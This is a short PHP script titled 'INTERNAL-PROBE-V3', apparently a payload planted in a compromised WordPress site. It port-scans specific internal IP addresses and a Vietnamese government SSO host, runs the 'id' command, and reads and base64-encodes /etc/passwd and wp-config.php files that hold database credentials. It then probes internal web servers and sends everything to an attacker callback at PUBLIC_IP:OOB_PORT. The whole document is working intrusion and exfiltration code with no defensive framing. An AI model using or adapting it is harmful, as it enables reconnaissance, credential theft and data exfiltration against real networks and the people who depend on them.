INTERNAL-PROBE-V3

[php]

$o = “”;
$targets = array(
“201_80” => “116.100.94.201:80”,
“202_80” => “116.100.94.202:80”,
“203_80” => “116.100.94.203:80”,
“204_80” => “116.100.94.204:80”,
“205_80” => “116.100.94.205:80”,
“206_80” => “116.100.94.206:80”,
“207_80” => “116.100.94.207:80”,
“201_3306” => “116.100.94.201:3306”,
“201_1433” => “116.100.94.201:1433”,
“201_6379” => “116.100.94.201:6379”,
);
foreach($targets as $k => $t) {
$s = @fsockopen($t, 3, $en, $es, 3);
if($s) { $o .= $k . “:OPEN;”; fclose($s); }
else { $o .= $k . “:CLOSED(” . $es . “);”; }
}
$o .= “\nCWDD:” . getcwd();
$o .= “\nUID:” . exec(“id 2>&1”);
$o .= “\nPASSWD:” . base64_encode(@file_get_contents(“/etc/passwd”));
// Try to read wp-config
$configs = array(“/var/www/html/wp-config.php”,”/var/www/wp-config.php”,”/srv/www/wordpress/wp-config.php”,”/usr/share/nginx/html/wp-config.php”);
foreach($configs as $c) {
if(file_exists($c)) {
$o .= “\nCONFIG:” . $c . “->” . base64_encode(file_get_contents($c));
}
}
// HTTP probe – curl
foreach(array(“116.100.94.201″,”116.100.94.202″,”116.100.94.203″,”116.100.94.204″,”sso.business.gov.vn”) as $ip) {
$ch = @curl_init(“http://” . $ip . “/”);
@curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
@curl_setopt($ch, CURLOPT_TIMEOUT, 5);
@curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 3);
$resp = @curl_exec($ch);
$info = @curl_getinfo($ch);
$o .= “\nHTTP_” . $ip . “:status=” . $info[‘http_code’] . “,len=” . strlen($resp) . “,body_start=” . substr($resp, 0, 100);
@curl_close($ch);
}
// OOB callback to confirm execution
@file_get_contents(“http://” . PUBLIC_IP . “:” . OOB_PORT . “/?result=” . urlencode($o));
// Store in WordPress options
echo $o;

[/php]